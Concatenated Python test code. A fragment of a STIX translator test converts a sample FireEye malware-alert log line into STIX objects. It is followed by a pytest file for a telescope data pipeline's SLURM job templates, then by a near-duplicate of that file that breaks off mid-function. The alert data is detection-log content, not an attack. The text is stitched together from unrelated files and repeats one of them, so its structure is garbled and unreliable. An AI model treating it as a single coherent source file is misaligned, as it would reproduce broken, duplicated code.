cs3Label=osinfo" " cs3=Microsoft Windows7 Professional 6.1 sp1 dvchost=wally dvc=10.2.101.101 cn1Label=vlan" " cn1=0 externalId=1 cs4Label=link " "cs4=https://wally.fireeye.com/malware_analysis/analyses?maid=1 cs2Label=anomaly" " cs2=misc-anomaly cs1Label=sname cs1=FE_UPX;Trojan.PWS.OnlineGames", "_serial": "0", "_si": ["splunk3-01.internal.resilientsystems.com", "main"], "_sourcetype": "fe_cef_syslog", "_time": "2019-01-08T15:18:04.000+00:00", "event_count": 1 } result_bundle = json_to_stix_translator.convert_to_stix( data_source, map_data, [data], get_module_transformers(MODULE), options, callback=hash_type_lookup) assert(result_bundle['type'] == 'bundle') result_bundle_objects = result_bundle['objects'] observed_data = result_bundle_objects[1] # somehow breaking the stix validation # validated_result = validate_instance(observed_data) # assert(validated_result.is_valid == True) assert('objects' in observed_data) objects = observed_data['objects'] nt_obj = TestTransform.get_first_of_type(objects.values(), 'network-traffic') assert(nt_obj is not None), 'network-traffic object type not found' assert(nt_obj.keys() == {'type', 'src_ref', 'src_port', 'dst_ref', 'dst_port', 'protocols'}) assert(nt_obj['src_port'] == 1220) assert(nt_obj['dst_port'] == 1120) assert(nt_obj['protocols'] == ['tcp']) ip_ref = nt_obj['dst_ref'] assert(ip_ref in objects), "dst_ref with key {nt_obj['dst_ref']} not found" ip_obj = objects[ip_ref] assert(ip_obj.keys() == {'type', 'value', 'resolves_to_refs'}) assert(ip_obj['type'] == 'ipv4-addr') assert(ip_obj['value'] == '127.0.0.1') assert (isinstance(ip_obj['resolves_to_refs'], list) and isinstance(ip_obj['resolves_to_refs'][0], str)) ip_ref = nt_obj['src_ref'] assert(ip_ref in objects), "src_ref with key {nt_obj['src_ref']} not found" ip_obj = objects[ip_ref] assert(ip_obj.keys() == {'type', 'value', 'resolves_to_refs'}) assert(ip_obj['type'] == 'ipv4-addr') assert(ip_obj['value'] == '169.250.0.1') assert (isinstance(ip_obj['resolves_to_refs'], list) and isinstance(ip_obj['resolves_to_refs'][0], str)) file_obj = TestTransform.get_first_of_type(objects.values(), 'file') assert (file_obj is not None), 'file object type not found' assert (file_obj.keys() == {'type', 'hashes'}) assert (file_obj['hashes']['SHA-1'] == "cf23df2207d99a74fbe169e3eba035e633b65d94") user_obj = TestTransform.get_first_of_type(objects.values(), 'user-account') assert (user_obj is not None), 'user object type not found' assert (user_obj.keys() == {'type', 'account_login', 'user_id'}) assert (user_obj['account_login'] == "sname") assert (user_obj['user_id'] == "sname") url_obj = TestTransform.get_first_of_type(objects.values(), 'url') assert (url_obj is not None), 'url object type not found' assert (url_obj.keys() == {'type', 'value'}) assert (url_obj['value'] == "https://wally.fireeye.com/malware_analysis/analyses?maid=1") domain_obj = TestTransform.get_first_of_type(objects.values(), 'domain-name') assert (domain_obj is not None), 'domain object type not found' assert (domain_obj.keys() == {'type', 'value'}) assert (domain_obj['value'] == "wally.fireeye.com") payload_obj = TestTransform.get_first_of_type(objects.values(), 'artifact') assert (payload_obj is not None), 'payload object type not found' assert (payload_obj.keys() == {'type', 'payload_bin'}) payload = 'SmFuIDA4IDIwMTkgMTU6MTg6MDQgMTkyLjE2OC4zMy4xMzEgZmVub3RpZnktMi5hbGVydDogQ0VGOjB8RmlyZUV5ZXxNQV' \ 'N8Ni4yLjAuNzQyOTh8TU98bWFsd2FyZS1vYmplY3R8NHxydD1KYW4gMDggMjAxOSAxNToxODowNCBaIHNyYz0xNjkuMjUw' \ 'LjAuMSBkcHQ9MTEyMCBkc3Q9MTI3LjAuMC4xIHNwdD0xMjIwIHNtYWM9QUE6QkI6Q0M6REQ6MTE6MjIgZG1hYz1FRTpERD' \ 'pCQjpBQTpDQzoxMSBjbjJMYWJlbD1zaWQgY24yPTExMSBmaWxlSGFzaD00MWEyNjI1NWQxNmQxMjFkYzUyNWE2NDQ1MTQ0' \ 'Yjg5NSBwcm90bz10Y3AgcmVxdWVzdD1odHRwOi8vcWEtc2VydmVyLmVuZy5maXJlZXllLmNvbS9RRS9Ob3RpZmljYXRpb2' \ '5QY2Fwcy81OC4yNTMuNjguMjlfODAtMTkyLjE2OC44NS4xMjhfMTE2NS0yMTE5MjgzMTA5X1QuZXhlIGNzM0xhYmVsPW9z' \ 'aW5mbyBjczM9TWljcm9zb2Z0IFdpbmRvd3M3IFByb2Zlc3Npb25hbCA2LjEgc3AxIGR2Y2hvc3Q9d2FsbHkgZHZjPTEwLj' \ 'IuMTAxLjEwMSBjbjFMYWJlbD12bGFuIGNuMT0wIGV4dGVybmFsSWQ9MSBjczRMYWJlbD1saW5rIGNzND1odHRwczovL3dh' \ 'bGx5LmZpcmVleWUuY29tL21hbHdhcmVfYW5hbHlzaXMvYW5hbHlzZXM/bWFpZD0xIGNzMkxhYmVsPWFub21hbHkgY3MyPW' \ '1pc2MtYW5vbWFseSBjczFMYWJlbD1zbmFtZSBjczE9RkVfVVBYO1Ryb2phbi5QV1MuT25saW5lR2FtZXM=' assert (payload_obj['payload_bin'] == payload)
import os from pathlib import Path from textwrap import dedent import pytest from osa.configs import options from osa.configs.config import cfg extra_files = Path(os.getenv("OSA_TEST_DATA", "extra")) datasequence_history_file = extra_files / "history_files/sequence_LST1_04185.0010.history" calibration_history_file = extra_files / "history_files/sequence_LST1_04183.history" options.date = "2020-01-17" options.tel_id = "LST1" options.prod_id = "v0.1.0" def test_historylevel(): from osa.job import historylevel options.dl1_prod_id = "tailcut84" options.dl2_prod_id = "model1" level, rc = historylevel(datasequence_history_file, "DATA") assert level == 0 assert rc == 0 level, rc = historylevel(calibration_history_file, "PEDCALIB") assert level == 0 assert rc == 0 options.dl1_prod_id = "tailcut84" options.dl2_prod_id = "model2" level, rc = historylevel(datasequence_history_file, "DATA") assert level == 1 assert rc == 0 def test_preparejobs(running_analysis_dir, sequence_list): from osa.job import prepare_jobs options.simulate = False options.directory = running_analysis_dir prepare_jobs(sequence_list) expected_calib_script = os.path.join(running_analysis_dir, "sequence_LST1_01809.py") expected_data_script = os.path.join(running_analysis_dir, "sequence_LST1_01807.py") assert os.path.isfile(os.path.abspath(expected_calib_script)) assert os.path.isfile(os.path.abspath(expected_data_script)) def test_sequence_filenames(running_analysis_dir, sequence_list): from osa.job import sequence_filenames for sequence in sequence_list: sequence_filenames(sequence) assert sequence.script == running_analysis_dir / f"sequence_LST1_{sequence.run:05d}.py" def test_scheduler_env_variables(sequence_list, running_analysis_dir): from osa.job import scheduler_env_variables # Extract the first sequence first_sequence = sequence_list[0] env_variables = scheduler_env_variables(first_sequence) assert env_variables == [ '#SBATCH --job-name=LST1_01809', '#SBATCH --time=1:15:00', f'#SBATCH --chdir={running_analysis_dir}', '#SBATCH --output=log/Run01809.%4a_jobid_%A.out', '#SBATCH --error=log/Run01809.%4a_jobid_%A.err', f'#SBATCH --partition={cfg.get('SLURM', 'PARTITION_PEDCALIB')}', '#SBATCH --mem-per-cpu=3GB', ] # Extract the second sequence second_sequence = sequence_list[1] env_variables = scheduler_env_variables(second_sequence) assert env_variables == [ '#SBATCH --job-name=LST1_01807', '#SBATCH --time=1:15:00', f'#SBATCH --chdir={running_analysis_dir}', '#SBATCH --output=log/Run01807.%4a_jobid_%A.out', '#SBATCH --error=log/Run01807.%4a_jobid_%A.err', '#SBATCH --array=0-10', f'#SBATCH --partition={cfg.get('SLURM', 'PARTITION_DATA')}', '#SBATCH --mem-per-cpu=16GB', ] def test_job_header_template(sequence_list, running_analysis_dir): """Extract and check the header for the first two sequences.""" from osa.job import job_header_template # Extract the first sequence first_sequence = sequence_list[0] header = job_header_template(first_sequence) output_string1 = dedent( f"""\ #!/bin/env python #SBATCH --job-name=LST1_01809 #SBATCH --time=1:15:00 #SBATCH --chdir={running_analysis_dir} #SBATCH --output=log/Run01809.%4a_jobid_%A.out #SBATCH --error=log/Run01809.%4a_jobid_%A.err #SBATCH --partition={cfg.get('SLURM', 'PARTITION_PEDCALIB')} #SBATCH --mem-per-cpu=3GB""" ) assert header == output_string1 # Extract the second sequence second_sequence = sequence_list[1] header = job_header_template(second_sequence) output_string2 = dedent( f"""\ #!/bin/env python #SBATCH --job-name=LST1_01807 #SBATCH --time=1:15:00 #SBATCH --chdir={running_analysis_dir} #SBATCH --output=log/Run01807.%4a_jobid_%A.out #SBATCH --error=log/Run01807.%4a_jobid_%A.err #SBATCH --array=0-10 #SBATCH --partition={cfg.get('SLURM', 'PARTITION_DATA')} #SBATCH --mem-per-cpu=16GB""" ) assert header == output_string2 def test_create_job_template_scheduler( sequence_list, drs4_time_calibration_files, drs4_baseline_file, calibration_file, run_summary_file, pedestal_ids_file, ): from osa.job import data_sequence_job_template assert pedestal_ids_file.exists() options.test = False options.simulate = False content1 = data_sequence_job_template(sequence_list[1]) expected_content1 = dedent( f"""\ #!/bin/env python #SBATCH --job-name=LST1_01807 #SBATCH --time=1:15:00 #SBATCH --chdir={Path.cwd()}/test_osa/test_files0/running_analysis/20200117/v0.1.0 #SBATCH --output=log/Run01807.%4a_jobid_%A.out #SBATCH --error=log/Run01807.%4a_jobid_%A.err #SBATCH --array=0-10 #SBATCH --partition={cfg.get('SLURM', 'PARTITION_DATA')} #SBATCH --mem-per-cpu={cfg.get('SLURM', 'MEMSIZE_DATA')} import os import subprocess import sys import tempfile os.environ['CTAPIPE_CACHE'] = '/fefs/aswg/lstanalyzer/.ctapipe/ctapipe_cache' os.environ['CTAPIPE_SVC_PATH'] = '/fefs/aswg/lstanalyzer/.ctapipe/service' os.environ['MPLCONFIGDIR'] = '/fefs/aswg/lstanalyzer/.cache/matplotlib' subruns = int(os.getenv('SLURM_ARRAY_TASK_ID')) with tempfile.TemporaryDirectory() as tmpdirname: os.environ['NUMBA_CACHE_DIR'] = tmpdirname proc = subprocess.run([ 'datasequence', '--config', '{Path.cwd()}/osa/configs/sequencer.cfg', '--date=2020-01-17', '--prod-id=v0.1.0', '--drs4-pedestal-file={drs4_baseline_file}', '--time-calib-file={drs4_time_calibration_files[0]}', '--pedcal-file={calibration_file}', '--systematic-correction-file={Path.cwd()}/test_osa/test_files0/monitoring/PixelCalibration/Cat-A/ffactor_systematics/20200725/pro/ffactor_systematics_20200725.h5', '--drive-file={Path.cwd()}/test_osa/test_files0/monitoring/DrivePositioning/drive_log_20_01_17.txt', '--run-summary={run_summary_file}', f'01807.{{subruns:04d}}', 'LST1' ]) sys.exit(proc.returncode)""" ) content2 = data_sequence_job_template(sequence_list[2]) expected_content2 = dedent( f"""\ #!/bin/env python #SBATCH --job-name=LST1_01808 #SBATCH --time=1:15:00 #SBATCH --chdir={Path.cwd()}/test_osa/test_files0/running_analysis/20200117/v0.1.0 #SBATCH --output=log/Run01808.%4a_jobid_%A.out #SBATCH --error=log/Run01808.%4a_jobid_%A.err #SBATCH --array=0-8 #SBATCH --partition={cfg.get('SLURM', 'PARTITION_DATA')} #SBATCH --mem-per-cpu={cfg.get('SLURM', 'MEMSIZE_DATA')} import os import subprocess import sys import tempfile os.environ['CTAPIPE_CACHE'] = '/fefs/aswg/lstanalyzer/.ctapipe/ctapipe_cache' os.environ['CTAPIPE_SVC_PATH'] = '/fefs/aswg/lstanalyzer/.ctapipe/service' os.environ['MPLCONFIGDIR'] = '/fefs/aswg/lstanalyzer/.cache/matplotlib' subruns = int(os.getenv('SLURM_ARRAY_TASK_ID')) with tempfile.TemporaryDirectory() as tmpdirname: os.environ['NUMBA_CACHE_DIR'] = tmpdirname proc = subprocess.run([ 'datasequence', '--config', '{Path.cwd()}/osa/configs/sequencer.cfg', '--date=2020-01-17', '--prod-id=v0.1.0', '--drs4-pedestal-file={drs4_baseline_file}', '--time-calib-file={drs4_time_calibration_files[0]}', '--pedcal-file={calibration_file}', '--systematic-correction-file={Path.cwd()}/test_osa/test_files0/monitoring/PixelCalibration/Cat-A/ffactor_systematics/20200725/pro/ffactor_systematics_20200725.h5', '--drive-file={Path.cwd()}/test_osa/test_files0/monitoring/DrivePositioning/drive_log_20_01_17.txt', '--run-summary={run_summary_file}', f'--pedestal-ids-file={Path.cwd()}/test_osa/test_files0/auxiliary/PedestalFinder/20200117/pedestal_ids_Run01808.{{subruns:04d}}.h5', f'01808.{{subruns:04d}}', 'LST1' ]) sys.exit(proc.returncode)""" ) options.simulate = True assert content1 == expected_content1 assert content2 == expected_content2 def test_create_job_template_local( sequence_list, drs4_time_calibration_files, drs4_baseline_file, calibration_file, systematic_correction_files, run_summary_file, pedestal_ids_file, r0_data, ): """Check the job file in local mode (assuming no scheduler).""" from osa.job import data_sequence_job_template for file in drs4_time_calibration_files: assert file.exists() for file in systematic_correction_files: assert file.exists() for file in r0_data: assert file.exists() assert pedestal_ids_file.exists() options.test = True options.simulate = False content1 = data_sequence_job_template(sequence_list[1]) expected_content1 = dedent( f"""\ #!/bin/env python import os import subprocess import sys import tempfile subruns = 0 with tempfile.TemporaryDirectory() as tmpdirname: os.environ['NUMBA_CACHE_DIR'] = tmpdirname proc = subprocess.run([ 'datasequence', '--config', '{Path.cwd()}/osa/configs/sequencer.cfg', '--date=2020-01-17', '--prod-id=v0.1.0', '--drs4-pedestal-file={drs4_baseline_file}', '--time-calib-file={drs4_time_calibration_files[0]}', '--pedcal-file={calibration_file}', '--systematic-correction-file={Path.cwd()}/test_osa/test_files0/monitoring/PixelCalibration/Cat-A/ffactor_systematics/20200725/pro/ffactor_systematics_20200725.h5', '--drive-file={Path.cwd()}/test_osa/test_files0/monitoring/DrivePositioning/drive_log_20_01_17.txt', '--run-summary={run_summary_file}', f'01807.{{subruns:04d}}', 'LST1' ]) sys.exit(proc.returncode)""" ) content2 = data_sequence_job_template(sequence_list[2]) expected_content2 = dedent( f"""\ #!/bin/env python import os import subprocess import sys import tempfile subruns = 0 with tempfile.TemporaryDirectory() as tmpdirname: os.environ['NUMBA_CACHE_DIR'] = tmpdirname proc = subprocess.run([ 'datasequence', '--config', '{Path.cwd()}/osa/configs/sequencer.cfg', '--date=2020-01-17', '--prod-id=v0.1.0', '--drs4-pedestal-file={drs4_baseline_file}', '--time-calib-file={drs4_time_calibration_files[0]}', '--pedcal-file={calibration_file}', '--systematic-correction-file={Path.cwd()}/test_osa/test_files0/monitoring/PixelCalibration/Cat-A/ffactor_systematics/20200725/pro/ffactor_systematics_20200725.h5', '--drive-file={Path.cwd()}/test_osa/test_files0/monitoring/DrivePositioning/drive_log_20_01_17.txt', '--run-summary={run_summary_file}', f'--pedestal-ids-file={Path.cwd()}/test_osa/test_files0/auxiliary/PedestalFinder/20200117/pedestal_ids_Run01808.{{subruns:04d}}.h5', f'01808.{{subruns:04d}}', 'LST1' ]) sys.exit(proc.returncode)""" ) options.simulate = True assert content1 == expected_content1 assert content2 == expected_content2 def test_create_job_scheduler_calibration(sequence_list): """Check the pilot job file for the calibration pipeline.""" from osa.job import calibration_sequence_job_template options.test = True options.simulate = False content = calibration_sequence_job_template(sequence_list[0]) expected_content = dedent( f"""\ #!/bin/env python import os import subprocess import sys import tempfile subruns = 0 with tempfile.TemporaryDirectory() as tmpdirname: os.environ['NUMBA_CACHE_DIR'] = tmpdirname proc = subprocess.run([ 'calibration_pipeline', '--config', '{Path.cwd()}/osa/configs/sequencer.cfg', '--date=2020-01-17', '--drs4-pedestal-run=01804', '--pedcal-run=01809', 'LST1' ]) sys.exit(proc.returncode)""" ) options.simulate = True assert content == expected_content def test_set_cache_dirs(): from osa.job import set_cache_dirs cache = set_cache_dirs() cache_dirs = dedent( f"""\ os.environ['CTAPIPE_CACHE'] = '{cfg.get('CACHE', 'CTAPIPE_CACHE')}' os.environ['CTAPIPE_SVC_PATH'] = '{cfg.get('CACHE', 'CTAPIPE_SVC_PATH')}' os.environ['MPLCONFIGDIR'] = '{cfg.get('CACHE', 'MPLCONFIGDIR')}'""" ) assert cache_dirs == cache def test_calibration_history_level(): from osa.job import check_history_level levels = {"onsite_create_drs4_pedestal_file": 1, "onsite_create_calibration_file": 0} level, exit_status = check_history_level(calibration_history_file, levels) assert level == 0 assert exit_status == 0 @pytest.fixture def mock_sacct_output(): """Mock output of sacct to be able to use it in get_squeue_output function.""" return Path("./extra") / 'sacct_output.csv' @pytest.fixture def mock_squeue_output(): """Mock output of squeue to be able to use it in get_squeue_output function.""" return Path("./extra") / 'squeue_output.csv' @pytest.fixture def sacct_output(mock_sacct_output): from osa.job import get_sacct_output return get_sacct_output(mock_sacct_output) @pytest.fixture def squeue_output(mock_squeue_output): from osa.job import get_squeue_output return get_squeue_output(mock_squeue_output) def test_set_queue_values(sacct_output, squeue_output, sequence_list): from osa.job import set_queue_values set_queue_values( sacct_info=sacct_output, squeue_info=squeue_output, sequence_list=sequence_list, ) # Running calibration sequence assert sequence_list[0].state == "RUNNING" assert sequence_list[0].exit is None assert sequence_list[0].jobid == 12951086 assert sequence_list[0].cputime == "00:36:00" assert sequence_list[0].tries == 4 # Pending DATA sequences assert sequence_list[1].state == "PENDING" assert sequence_list[1].tries == 2 assert sequence_list[1].exit is None assert sequence_list[2].state == "PENDING" assert sequence_list[2].exit is None assert sequence_list[2].tries == 1 def test_plot_job_statistics(sacct_output, running_analysis_dir): from osa.job import plot_job_statistics log_dir = running_analysis_dir / "log" log_dir.mkdir(parents=True, exist_ok=True) assert log_dir.exists() plot_job_statistics(sacct_output, log_dir) plot_file = log_dir / "job_statistics.pdf" assert plot_file.exists() def test_run_program_with_history_logging(running_analysis_dir): from osa.job import run_program_with_history_logging options.simulate = False cmd = ["echo", "Testing"] history_file = running_analysis_dir / "test.history" run = "01140" prod_id = "v0.2.0" command = "echo" config_file = "config_test.json" rc = run_program_with_history_logging( command_args=cmd, history_file=history_file, run=run, prod_id=prod_id, command=command, config_file=config_file, ) options.simulate = True assert rc == 0 assert history_file.exists()
import os from pathlib import Path from textwrap import dedent import pytest from osa.configs import options from osa.configs.config import cfg extra_files = Path(os.getenv("OSA_TEST_DATA", "extra")) datasequence_history_file = extra_files / "history_files/sequence_LST1_04185.0010.history" calibration_history_file = extra_files / "history_files/sequence_LST1_04183.history" options.date = "2020-01-17" options.tel_id = "LST1" options.prod_id = "v0.1.0" def test_historylevel(): from osa.job import historylevel options.dl1_prod_id = "tailcut84" options.dl2_prod_id = "model1" level, rc = historylevel(datasequence_history_file, "DATA") assert level == 0 assert rc == 0 level, rc = historylevel(calibration_history_file, "PEDCALIB") assert level == 0 assert rc == 0 options.dl1_prod_id = "tailcut84" options.dl2_prod_id = "model2" level, rc = historylevel(datasequence_history_file, "DATA") assert level == 1 assert rc == 0 def test_preparejobs(running_analysis_dir, sequence_list): from osa.job import prepare_jobs options.simulate = False options.directory = running_analysis_dir prepare_jobs(sequence_list) expected_calib_script = os.path.join(running_analysis_dir, "sequence_LST1_01809.py") expected_data_script = os.path.join(running_analysis_dir, "sequence_LST1_01807.py") assert os.path.isfile(os.path.abspath(expected_calib_script)) assert os.path.isfile(os.path.abspath(expected_data_script)) def test_sequence_filenames(running_analysis_dir, sequence_list): from osa.job import sequence_filenames for sequence in sequence_list: sequence_filenames(sequence) assert sequence.script == running_analysis_dir / f"sequence_LST1_{sequence.run:05d}.py" def test_scheduler_env_variables(sequence_list, running_analysis_dir): from osa.job import scheduler_env_variables # Extract the first sequence first_sequence = sequence_list[0] env_variables = scheduler_env_variables(first_sequence) assert env_variables == [ '#SBATCH --job-name=LST1_01809', '#SBATCH --time=1:15:00', f'#SBATCH --chdir={running_analysis_dir}', '#SBATCH --output=log/Run01809.%4a_jobid_%A.out', '#SBATCH --error=log/Run01809.%4a_jobid_%A.err', f'#SBATCH --partition={cfg.get("SLURM", "PARTITION_PEDCALIB")}', '#SBATCH --mem-per-cpu=3GB', ] # Extract the second sequence second_sequence = sequence_list[1] env_variables = scheduler_env_variables(second_sequence) assert env_variables == [ '#SBATCH --job-name=LST1_01807', '#SBATCH --time=1:15:00', f'#SBATCH --chdir={running_analysis_dir}', '#SBATCH --output=log/Run01807.%4a_jobid_%A.out', '#SBATCH --error=log/Run01807.%4a_jobid_%A.err', '#SBATCH --array=0-10', f'#SBATCH --partition={cfg.get("SLURM", "PARTITION_DATA")}', '#SBATCH --mem-per-cpu=16GB', ] def test_job_header_template(sequence_list, running_analysis_dir): """Extract and check the header for the first two sequences.""" from osa.job import job_header_template # Extract the first sequence first_sequence = sequence_list[0] header = job_header_template(first_sequence) output_string1 = dedent( f"""\ #!/bin/env python #SBATCH --job-name=LST1_01809 #SBATCH --time=1:15:00 #SBATCH --chdir={running_analysis_dir} #SBATCH --output=log/Run01809.%4a_jobid_%A.out #SBATCH --error=log/Run01809.%4a_jobid_%A.err #SBATCH --partition={cfg.get('SLURM', 'PARTITION_PEDCALIB')} #SBATCH --mem-per-cpu=3GB""" ) assert header == output_string1 # Extract the second sequence second_sequence = sequence_list[1] header = job_header_template(second_sequence) output_string2 = dedent( f"""\ #!/bin/env python #SBATCH --job-name=LST1_01807 #SBATCH --time=1:15:00 #SBATCH --chdir={running_analysis_dir} #SBATCH --output=log/Run01807.%4a_jobid_%A.out #SBATCH --error=log/Run01807.%4a_jobid_%A.err #SBATCH --array=0-10 #SBATCH --partition={cfg.get('SLURM', 'PARTITION_DATA')} #SBATCH --mem-per-cpu=16GB""" ) assert header == output_string2 def test_create_job_template_scheduler( sequence_list, drs4_time_calibration_files, drs4_baseline_file, calibration_file, run_summary_file, pedestal_ids_file, ): from osa.job import data_sequence_job_template assert pedestal_ids_file.exists() options.test = False options.simulate = False content1 = data_sequence_job_template(sequence_list[1]) expected_content1 = dedent( f"""\ #!/bin/env python #SBATCH --job-name=LST1_01807 #SBATCH --time=1:15:00 #SBATCH --chdir={Path.cwd()}/test_osa/test_files0/running_analysis/20200117/v0.1.0 #SBATCH --output=log/Run01807.%4a_jobid_%A.out #SBATCH --error=log/Run01807.%4a_jobid_%A.err #SBATCH --array=0-10 #SBATCH --partition={cfg.get('SLURM', 'PARTITION_DATA')} #SBATCH --mem-per-cpu={cfg.get('SLURM', 'MEMSIZE_DATA')} import os import subprocess import sys import tempfile os.environ['CTAPIPE_CACHE'] = '/fefs/aswg/lstanalyzer/.ctapipe/ctapipe_cache' os.environ['CTAPIPE_SVC_PATH'] = '/fefs/aswg/lstanalyzer/.ctapipe/service' os.environ['MPLCONFIGDIR'] = '/fefs/aswg/lstanalyzer/.cache/matplotlib' subruns = int(os.getenv('SLURM_ARRAY_TASK_ID')) with tempfile.TemporaryDirectory() as tmpdirname: os.environ['NUMBA_CACHE_DIR'] = tmpdirname proc = subprocess.run([ 'datasequence', '--config', '{Path.cwd()}/osa/configs/sequencer.cfg', '--date=2020-01-17', '--prod-id=v0.1.0', '--drs4-pedestal-file={drs4_baseline_file}', '--time-calib-file={drs4_time_calibration_files[0]}', '--pedcal-file={calibration_file}', '--systematic-correction-file={Path.cwd()}/test_osa/test_files0/monitoring/PixelCalibration/Cat-A/ffactor_systematics/20200725/pro/ffactor_systematics_20200725.h5', '--drive-file={Path.cwd()}/test_osa/test_files0/monitoring/DrivePositioning/drive_log_20_01_17.txt', '--run-summary={run_summary_file}', f'01807.{{subruns:04d}}', 'LST1' ]) sys.exit(proc.returncode)""" ) content2 = data_sequence_job_template(sequence_list[2]) expected_content2 = dedent( f"""\ #!/bin/env python #SBATCH --job-name=LST1_01808 #SBATCH --time=1:15:00 #SBATCH --chdir={Path.cwd()}/test_osa/test_files0/running_analysis/20200117/v0.1.0 #SBATCH --output=log/Run01808.%4a_jobid_%A.out #SBATCH --error=log/Run01808.%4a_jobid_%A.err #SBATCH --array=0-8 #SBATCH --partition={cfg.get('SLURM', 'PARTITION_DATA')} #SBATCH --mem-per-cpu={cfg.get('SLURM', 'MEMSIZE_DATA')} import os import subprocess import sys import tempfile os.environ['CTAPIPE_CACHE'] = '/fefs/aswg/lstanalyzer/.ctapipe/ctapipe_cache' os.environ['CTAPIPE_SVC_PATH'] = '/fefs/aswg/lstanalyzer/.ctapipe/service' os.environ['MPLCONFIGDIR'] = '/fefs/aswg/lstanalyzer/.cache/matplotlib' subruns = int(os.getenv('SLURM_ARRAY_TASK_ID')) with tempfile.TemporaryDirectory() as tmpdirname: os.environ['NUMBA_CACHE_DIR'] = tmpdirname proc = subprocess.run([ 'datasequence', '--config', '{Path.cwd()}/osa/configs/sequencer.cfg', '--date=2020-01-17', '--prod-id=v0.1.0', '--drs4-pedestal-file={drs4_baseline_file}', '--time-calib-file={drs4_time_calibration_files[0]}', '--pedcal-file={calibration_file}', '--systematic-correction-file={Path.cwd()}/test_osa/test_files0/monitoring/PixelCalibration/Cat-A/ffactor_systematics/20200725/pro/ffactor_systematics_20200725.h5', '--drive-file={Path.cwd()}/test_osa/test_files0/monitoring/DrivePositioning/drive_log_20_01_17.txt', '--run-summary={run_summary_file}', f'--pedestal-ids-file={Path.cwd()}/test_osa/test_files0/auxiliary/PedestalFinder/20200117/pedestal_ids_Run01808.{{subruns:04d}}.h5', f'01808.{{subruns:04d}}', 'LST1' ]) sys.exit(proc.returncode)""" ) options.simulate = True assert content1 == expected_content1 assert content2 == expected_content2 def test_create_job_template_local( sequence_list, drs4_time_calibration_files, drs4_baseline_file, calibration_file, systematic_correction_files, run_summary_file, pedestal_ids_file, r0_data, ): """Check the job file in local mode (assuming no scheduler).""" from osa.job import data_sequence_job_template for file in drs4_time_calibration_files: assert file.exists() for file in systematic_correction_files: assert file.exists() for file in r0_data: assert file.exists() assert pedestal_ids_file.exists() options.test = True options.simulate = False content1 = data_sequence_job_template(sequence_list[1]) expected_content1 = dedent( f"""\ #!/bin/env python import os import subprocess import sys import tempfile subruns = 0 with tempfile.TemporaryDirectory() as tmpdirname: os.environ['NUMBA_CACHE_DIR'] = tmpdirname proc = subprocess.run([ 'datasequence', '--config', '{Path.cwd()}/osa/configs/sequencer.cfg', '--date=2020-01-17', '--prod-id=v0.1.0', '--drs4-pedestal-file={drs4_baseline_file}', '--time-calib-file={drs4_time_calibration_files[0]}', '--pedcal-file={calibration_file}', '--systematic-correction-file={Path.cwd()}/test_osa/test_files0/monitoring/PixelCalibration/Cat-A/ffactor_systematics/20200725/pro/ffactor_systematics_20200725.h5', '--drive-file={Path.cwd()}/test_osa/test_files0/monitoring/DrivePositioning/drive_log_20_01_17.txt', '--run-summary={run_summary_file}', f'01807.{{subruns:04d}}', 'LST1' ]) sys.exit(proc.returncode)""" ) content2 = data_sequence_job_template(sequence_list[2]) expected_content2 = dedent( f"""\ #!/bin/env python import os import subprocess import sys import tempfile subruns = 0 with tempfile.TemporaryDirectory() as tmpdirname: os.environ['NUMBA_CACHE_DIR'] = tmpdirname proc = subprocess.run([ 'datasequence', '--config', '{Path.cwd()}/osa/configs/sequencer.cfg', '--date=2020-01-17', '--prod-id=v0.1.0', '--drs4-pedestal-file={drs4_baseline_file}', '--time-calib-file={drs4_time_calibration_files[0]}', '--pedcal-file={calibration_file}', '--systematic-correction-file={Path.cwd()}/test_osa/test_files0/monitoring/PixelCalibration/Cat-A/ffactor_systematics/20200725/pro/ffactor_systematics_20200725.h5', '--drive-file={Path.cwd()}/test_osa/test_files0/monitoring/DrivePositioning/drive_log_20_01_17.txt', '--run-summary={run_summary_file}', f'--pedestal-ids-file={Path.cwd()}/test_osa/test_files0/auxiliary/PedestalFinder/20200117/pedestal_ids_Run01808.{{subruns:04d}}.h5', f'01808.{{subruns:04d}}', 'LST1' ]) sys.exit(proc.returncode)""" ) options.simulate = True assert content1 == expected_content1 assert content2 == expected_content2 def test_create_job_scheduler_calibration(sequence_list): """Check the pilot job file for the calibration pipeline.""" from osa.job import calibration_sequence_job_template options.test = True options.simulate = False content = calibration_sequence_job_template(sequence_list[0]) expected_content = dedent( f"""\ #!/bin/env python import os import subprocess import sys import tempfile subruns = 0 with tempfile.TemporaryDirectory() as tmpdirname: os.environ['NUMBA_CACHE_DIR'] = tmpdirname proc = subprocess.run([ 'calibration_pipeline', '--config', '{Path.cwd()}/osa/configs/sequencer.cfg', '--date=2020-01-17', '--drs4-pedestal-run=01804', '--pedcal-run=01809', 'LST1' ]) sys.exit(proc.returncode)""" ) options.simulate = True assert content == expected_content def test_set_cache_dirs(): from osa.job import set_cache_dirs cache = set_cache_dirs() cache_dirs = dedent( f"""\ os.environ['CTAPIPE_CACHE'] = '{cfg.get('CACHE', 'CTAPIPE_CACHE')}' os.environ['CTAPIPE_SVC_PATH'] = '{cfg.get('CACHE', 'CTAPIPE_SVC_PATH')}' os.environ['MPLCONFIGDIR'] = '{cfg.get('CACHE', 'MPLCONFIGDIR')}'""" ) assert cache_dirs == cache def test_calibration_history_level(): from osa.job import check_history_level levels = {"onsite_create_drs4_pedestal_file": 1, "onsite_create_calibration_file": 0} level, exit_status = check_history_level(calibration_history_file, levels) assert level == 0 assert exit_status == 0 @pytest.fixture def mock_sacct_output(): """Mock output of sacct to be able to use it in get_squeue_output function.""" return Path("./extra") / 'sacct_output.csv' @pytest.fixture def mock_squeue_output(): """Mock output of squeue to be able to use it in get_squeue_output function.""" return Path("./extra") / 'squeue_output.csv' @pytest.fixture def sacct_output(mock_sacct_output): from osa.job import get_sacct_output return get_sacct_output(mock_sacct_output) @pytest.fixture def squeue_output(mock_squeue_output): from osa.job import get_squeue_output return get_squeue_output(mock_squeue_output) def test_set_queue_values(sacct_output, squeue_output, sequence_list): from osa.job import set_queue_values set_queue_values( sacct_info=sacct_output, squeue_info=squeue_output, sequence_list=sequence_list, ) # Running calibration sequence assert sequence_list[0].state == "RUNNING" assert sequence_list[0].exit is None assert sequence_list[0].jobid == 12951086 assert sequence_list[0].cputime == "00:36:00" assert sequence_list[0].tries == 4 # Pending DATA sequences assert sequence_list[1].state == "PENDING" assert sequence_list[1].tries == 2 assert sequence_list[1].exit is None assert sequence_list[2].state == "PENDING" assert sequence_list[2].exit is None assert sequence_list[2].tries == 1 def test_plot_job_statistics(sacct_output, running_analysis_dir): from osa.job import 